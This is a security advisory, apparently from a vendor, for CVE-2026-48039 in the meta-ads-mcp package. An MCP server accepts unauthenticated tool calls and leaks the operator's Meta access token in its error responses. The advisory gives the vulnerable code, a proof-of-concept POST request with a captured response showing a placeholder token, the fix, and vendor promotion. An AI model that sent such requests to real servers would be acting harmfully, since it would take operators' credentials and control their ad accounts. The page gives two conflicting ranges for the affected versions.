CVE-2026-48039

CVE-2026-48039 is a critical-severity improper authentication vulnerability in meta-ads-mcp (pip), affecting versions <= 1.0.108. It is fixed in 1.0.109.

Summary

Unauthenticated HTTP MCP Tool Execution Leaks Operator Meta Access Token

Field Value
Repository pipeboard-co/meta-ads-mcp
Affected version ≤ 1.0.101 (commit 496c988 ~ 7d14226); Versions 1.0.102–1.0.105 lack git tags, so patch status is unconfirmed.
Vulnerability CWE-287, Improper Authentication
Severity Critical
CVSS 3.1 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

AuthInjectionMiddleware.dispatch() at http_auth_integration.py:272 unconditionally forwards unauthenticated Streamable HTTP requests to downstream MCP tool handlers without issuing a 401 response, allowing any network-reachable caller to invoke MCP tools without authentication. When no per-request credential is present, tool handlers fall back to the META_ACCESS_TOKEN environment variable, and when the downstream Meta Graph API call fails, api.py:263–269 serialises the raw httpx request URL, including the operator's access_token as a query parameter, into the JSON-RPC response body, delivering the credential to the unauthenticated caller.

Affected Code

meta_ads_mcp/core/http_auth_integration.py:272, middleware unconditionally calls call_next(request) even when no auth headers are present

        if not auth_token and not pipeboard_token:
            logger.warning("HTTP Auth Middleware: No authentication tokens found in headers")

        try:
            response = await call_next(request)   # line 272: no 401 returned
            return response
        finally:
            if auth_token:
                FastMCPAuthIntegration.clear_auth_token()
            if pipeboard_token:
                FastMCPAuthIntegration.clear_pipeboard_token()

meta_ads_mcp/core/api.py:136, operator token appended to URL query parameters, exposed verbatim in Graph API error response request_url

    request_params = params or {}
    request_params["access_token"] = access_token

Unauthenticated HTTP POST /mcp → AuthInjectionMiddleware.dispatch():272 (no 401 returned) → tool handler invokes make_api_request() using META_ACCESS_TOKEN env fallback → request_params["access_token"]:136 (token in URL) → Graph API error path at api.py:263–269 returns request_url containing access_token=… in 200 OK JSON-RPC response.

Proof of Concept

Step 1, POST /mcp with no auth headers: HTTP 200 OK with operator access_token in request_url, proves unauthenticated tool execution and operator credential leakage.

docker run --rm -p 127.0.0.1:8080:8080 -e META_ACCESS_TOKEN=FAKE_TOKEN_FOR_POC_DEMO_123456789 meta-ads-mcp-vuln001 &
python3 poc.py
POST /mcp HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/json
Accept: application/json, text/event-stream

{"jsonrpc":"2.0","method":"tools/call","id":2,"params":{"name":"get_ad_accounts","arguments":{"limit":1}}}
HTTP/1.1 200 OK
Content-Type: application/json

{
  "jsonrpc": "2.0",
  "id": 2,
  "result": {
    "content": [
      {
        "type": "text",
        "text": "{\"data\": \"{\\n  \\\"error\\\": {\\n    \\\"message\\\": \\\"HTTP Error: 400\\\",\\n    \\\"details\\\": {\\n      \\\"error\\\": {\\n        \\\"message\\\": \\\"Invalid OAuth access token data.\\\",\\n        \\\"type\\\": \\\"OAuthException\\\",\\n        \\\"code\\\": 190\\n      }\\n    },\\n    \\\"full_response\\\": {\\n      \\\"status_code\\\": 400,\\n      \\\"url\\\": \\\"https://graph.facebook.com/v24.0/me/adaccounts?...&access_token=FAKE_TOKEN_FOR_POC_DEMO_123456789\\\",\\n      \\\"request_url\\\": \\\"https://graph.facebook.com/v24.0/me/adaccounts?fields=id%2Cname%2Caccount_id%2Caccount_status%2Camount_spent%2Cbalance%2Ccurrency%2Cage%2Cbusiness_city%2Cbusiness_country_code&limit=1&access_token=FAKE_TOKEN_FOR_POC_DEMO_123456789\\\"\\n    }\\n  }\\n}\"}"
      }
    ],
    "isError": false
  }
}

Impact

An unauthenticated attacker who can reach the MCP server's HTTP port (default 8080) can invoke any registered MCP tool as the operator, consuming the operator's Meta Ads API quota and performing read or write operations on connected Meta ad accounts. When any tool call triggers a Graph API error, the operator's META_ACCESS_TOKEN is returned verbatim in the request_url field of the 200 OK JSON-RPC response, enabling the attacker to exfiltrate the long-lived credential and subsequently access the Meta Graph API directly outside the MCP interface.

The application does not adequately verify the identity of a user, device, or process before granting access. Typical impact: unauthorized access to functions or data reserved for authenticated parties.

CVE-2026-48039 has a CVSS score of 9.1 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.0.109); upgrading removes the vulnerable code path.

Affected versions

meta-ads-mcp (<= 1.0.108)

Security releases

meta-ads-mcp → 1.0.109 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

In AuthInjectionMiddleware.dispatch() (http_auth_integration.py), return a 401 Unauthorized response when neither auth_token nor pipeboard_token is present, instead of falling through to call_next:

from starlette.responses import Response

if not auth_token and not pipeboard_token:
    return Response(
        content='{"error":"Unauthorized"}',
        status_code=401,
        media_type="application/json",
    )

In make_api_request() (api.py), strip access_token from the request_url in error payloads, or transmit the token via an Authorization: Bearer header rather than a URL query parameter to prevent it from appearing in URLs, server logs, or error responses.

Frequently Asked Questions

  1. What is CVE-2026-48039? CVE-2026-48039 is a critical-severity improper authentication vulnerability in meta-ads-mcp (pip), affecting versions <= 1.0.108. It is fixed in 1.0.109. The application does not adequately verify the identity of a user, device, or process before granting access.
  2. How severe is CVE-2026-48039? CVE-2026-48039 has a CVSS score of 9.1 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of meta-ads-mcp are affected by CVE-2026-48039? meta-ads-mcp (pip) versions <= 1.0.108 is affected.
  4. Is there a fix for CVE-2026-48039? Yes. CVE-2026-48039 is fixed in 1.0.109. Upgrade to this version or later.
  5. Is CVE-2026-48039 exploitable, and should I be worried? Whether CVE-2026-48039 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-48039 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-48039? Upgrade meta-ads-mcp to 1.0.109 or later.

Other vulnerabilities in meta-ads-mcp

Stop the waste.
Protect your environment with Kodem.